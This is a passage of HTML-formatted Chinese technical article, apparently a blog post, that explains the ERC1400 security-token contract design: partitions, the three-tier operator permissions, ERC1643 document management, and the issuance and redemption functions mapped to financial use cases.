16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">角色管理模块(Roles) ：实现了精细化的 RBAC（基于角色的访问控制）。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">验证器模块：这是 RWA 的“合规大脑”，承载了合规检查逻辑，如白名单管理、黑名单过滤、证书签名验证、交易暂停控制等多项合规功能。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">扩展：提供了针对特定业务场景的成品实现。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">用户扩展模块：通过发送方和接收方钩子(Hooks)，赋予了代币可编程性。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">工具合约模块：提供了一系列实用工具，如 DomainAware 、ERC1820 和批量操作工具。</span></span></p></li></ul><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">2、ERC1400 (UniversalToken) 核心合约深度剖析</span></span></h3><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">2.1 核心数据结构详解</span></span></h4><h5 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">2.1.1 通证基本信息</span></span></h5><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">合约在标准 ERC20 的 metadata 之外，引入了具有证券意义的参数：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">granularity（粒度）来确保证券的最小交易（可分割）单位。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">isControllable 来允许监管机构或发行方在必要时强制转移或赎回通证（如法律要求）。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">isIssuable 控制着是否还能增发新代币。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">migrated 在智能合约升级需要添加新功能时，可以部署新版本的合约，并通过迁移机制将用户引导至新合约并由中央合约注册表记录。</span></span></p></li></ul><h5 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">2.1.2 分区(Partition) - ERC1400 的核心创新</span></span></h5></b></p><p><b data-pm-slice="0 0 []"><h5 dir="ltr"><p><b data-pm-slice="0 0 []"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-weight: normal;">分区(Partition) 机制是 ERC1400 最具创新性的设计，它将一个代币合约内的代币划分为多个相互独立的分区，每个分区拥有独立的余额和供应量统计。</span></span></p></b></p></h5><h5 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 16px;font-weight: bold;">2.1.3 操作者(Operator) 权限体系</span></span></h5><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ERC1400 设计了一个三层的操作者权限体系，这一设计在灵活性和安全性之间取得了精妙的平衡。 </span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 24px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">第一层是全局控制者(Global Controllers)，这些地址通常代表着非代币持有者专属的证券发行方、监管机构或其他具有特殊权限的实体。</span></span></p><p dir="ltr" style="margin-top: 16px;text-indent: 0px;line-height: 25.6px;margin-bottom: 16px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">第二层是用户授权的操作者(Authorized Operators)，这类似于 ERC20 的 approve 机制，但权限范围更广。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 24px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">第三层是分区操作者(Partition Operators)，这是 ERC1400 特有的精细化权限控制机制。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 16px;font-weight: bold;">2.1.4 文档管理系统</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ERC1400 集成了 ERC1643 文档管理标准，解决了证券资产“链上确权，链下存证”的法律合规痛点。 </span></span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">文档管理系统的核心：文档 URI、文档哈希和时间戳。</span></span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">文档的设置和删除权限被严格限制在控制者范围内，这确保了只有授权实体才能管理官方文档。</span></span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 24px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在实践中，文档管理系统可以存储各类重要信息。</span></span></p></li></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">2.2 核心功能模块分析</span></span></p><h5 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">2.2.1 发行(Issuance) 功能</span></span></h5><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代币发行是证券生命周期的起点，ERC1400 为此设计了灵活而安全的发行机制。发行功能被限制在具有铸币者(Minter) 或 owner 角色并且只有在可发行性标志开启，双重限制的情况下才能执行，以确保发行权力的可控性。 </span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 24px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">发行操作支持两种模式：简单发行和分区发行。简单发行会将新代币添加到默认分区，这适用于不需要复杂分类的场景。分区发行则允许指定代币应该被添加到哪个分区。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在现实世界的证券通证化实践中，以上发行机制能够映射多种复杂的金融业务场景：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">IPO / STO 新股发行</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">私募轮融资(Private Placement)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">员工期权授予(ESOP)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">股票分红（以股代息）</span></span></p></li></ul><h5 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">2.2.2 赎回(Redemption) 功能</span></span></h5><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代币赎回是证券生命周期的重要环节，代表着资产的退出和销毁和供应量的减少。ERC1400 实现了四种不同的赎回路径，以满足各种业务需求：</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">基础赎回功能允许代币持有者主动销毁自己的代币，这种操作通常用于资产清算或主动退出。</span></span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">操作者赎回功能允许授权的操作者代表代币持有者执行赎回。</span></span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">分区赎回功能提供指定分区赎回代币，这在保持其他分区代币完整性时及其重要。</span></span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 24px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">所有赎回操作都会经过完整的验证流程，包括调用发送方钩子和代币验证器。这确保了赎回操作同样受到合规规则的约束。</span></span></p></li></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在现实世界的证券通证化实践中，赎回机制能够映射多种复杂的金融业务场景：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">股票回购(Share Buyback)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">公司清算分配(Liquidation Distribution)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">可赎回债券到期(Callable Bond Maturity)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: 